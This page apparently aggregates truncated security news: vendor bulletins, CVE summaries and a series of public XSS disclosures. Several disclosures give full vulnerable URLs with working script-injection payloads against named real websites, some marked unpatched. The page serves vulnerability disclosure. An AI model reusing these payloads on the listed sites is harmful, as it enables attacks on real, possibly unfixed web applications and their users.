Sandbox Restrictions Bypass

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime Environment and the OpenJDK 8 Java Software Development Kit. Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Ja...

Security Bulletin: IBM System x Integrated Management Module (IMM) Lighttpd W (CVE-2011-4362, CVE-2010-0295, CVE-2008-4360, CVE-2008-4359, CVE-20084298, CVE-2008-1531)

Summary Older versions of lighttpd, used by System x IMM contain multiple vulnerabilities. Vulnerability Details Abstract Older versions of lighttpd, used by System x IMM contain multiple vulnerabilities. Content Vulnerability Details: CVE ID: CVE-2011-4362 Description: Integer signedness error i...

Man-in-the-Middle (MitM)

kube-rbac-proxy is vulnerable to man-in-the-middle attack. Insecure ciphers and TLS 1.0 are used to establish an SSL connection between the client and server, which would allow a remote attacker to exploit TLS vulnerabilities and perform man-in-the-middle attacks to sniff traffic containing...

Free High-Tech Bridge ImmuniWeb Application Discovery service

Today I would like to talk about another service for application security analysis by High-Tech Bridge. It's called ImmuniWeb Application Discovery. This service can get information about your web and mobile applications available from the Internet. Believe me, this is not so obvious for a large...

Security Bulletin: IBM Security Access Manager for Web - NIST setting (CVE-2014-3052)

Summary A defect in the configuration of IBM Security Access Manager ISAM for Web v8.0 could result in systems failing to properly comply to NIST800-131 standards. Vulnerability Details CVE ID : CVE-2014-3052 DESCRIPTION: The reverse proxy component of IBM Security Access Manager for Web can be...

CVE-2018-0233

A vulnerability in the Secure Sockets Layer SSL packet reassembly functionality of the detection engine in Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause the detection engine to consume excessive system memory on an affected device, which could cause a...

Storefront ErrorCode=65150 : An SSL connection to the server couldn't be established because the server's certificate was not trusted.

When youopen Citrix Receiver inside the Desktop VDA ICA Session, youdon’t get the Login prompt even because youget an error while connecting to the Store which points to the NS LB VIP. You cansee errorCode=65150 : An SSL connection to the server couldn't be established because the server's...

CVE-2017-9968

A security misconfiguration vulnerability exists in Schneider Electric's IGSS Mobile application versions 3.01 and prior in which a lack of certificate pinning during the TLS/SSL connection establishing process can result in a man-in-the-middle attack...

Circle with Disney Rclient SSH Persistent Remote Access Vulnerability(CVE-2017-12084)

Summary A backdoor vulnerability exists in remote control functionality of Circle with Disney running firmware 2.0.1. A specific set of network packets can remotely start an SSH server on the device, resulting in a persistent backdoor. An attacker send an API call to enable the SSH server. Tested...

ru.marein.it XSS vulnerability

Vulnerable URL: https://ru.marein.it/prod.taf?code=%E2%80%9D%3E%3Csvg%20onload=alert1337%3E Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check ru.marein.it SSL...

SUSE-SU-2017:2831-1 Security update for curl

This update for curl fixes the following issues: Security issues fixed: - CVE-2017-1000254: FTP PWD response parser out of bounds read bsc1061876 - CVE-2017-1000257: IMAP FETCH response out of bounds read bsc1063824 Bugs fixed: - Fixed error 'error:1408F10B:SSL routines' when connecting to ftps v...

antiwar.com XSS vulnerability

Vulnerable URL: http://www.antiwar.com///archives.php?author=" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 19.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 64654 VIP website status:| No Check antiwar.com SSL connection:| Grade...

muellerscience.com XSS vulnerability

Vulnerable URL: http://www.muellerscience.com/searchresult.php?sw=%27%22/%3E%3Cscript%3Ealert/OPENBUGBOUNTY/;%3C/script%3E=0=0=2=0=0=43 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 18.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Ran...

gogolistings.com XSS vulnerability

Vulnerable URL: http://www.gogolistings.com//?cityid=1〈=en="=50=ads Details: Description| Value ---|--- Patched:| No Latest check for patch:| 16.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 989552 VIP website status:| No Check gogolistings.com SSL...

kb-fr.sandisk.com XSS vulnerability

Vulnerable URL: http://kb-fr.sandisk.com/app/error/errorid/404/url/%2522%253E%253Cimg%2520src%253D1%2520onerror%253Dprompt%2528'openbugbounty'%2529%253E\n Details: Description| Value ---|--- Patched:| No Latest check for patch:| 16.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly...

listyourself.net XSS vulnerability

Vulnerable URL: https://www.listyourself.net/BulkList/SignUp.jsp?Name=xss%22%3E%3Csvg/onload=prompt/openbugbounty/%3E=9025%20Avenue%20Pointe%20Circle,%20Suite%20206%20%0DOrlando,%20FL,%[email protected]=3212365136=Quick Details: Description| Value ---|--- Patched:| No Late...

minnstate.edu XSS vulnerability

Vulnerable URL: http://www.minnstate.edu/jobs/searchResults.php?keyWord='"====10=Search=inst=6 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 15.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 393250 VIP website status:| No Check...

collegeofsanmateo.edu XSS vulnerability

Vulnerable URL: https://collegeofsanmateo.edu/siteindex/index.php?keyword='" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 15.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 149793 VIP website status:| No Check collegeofsanmateo.e...

dobi.ch XSS vulnerability

Vulnerable URL: https://www.dobi.ch/search?text=qqqqqqqqqqqqqqqqqqqqqqqq"-promptOPENBUGBOUNTY-" Details: Description| Value ---|--- Patched:| Verification in progress Latest check for patch:| 15.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1082052 VIP...

creps-montpellier.org XSS vulnerability

Vulnerable URL: https://www.creps-montpellier.org/search-result?s=+%3Cscript%3Ealert%27OPENBUGBOUNTY%27%3C/script%3E\n Details: Description| Value ---|--- Patched:| No Latest check for patch:| 14.01.2018 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 4423718 VIP...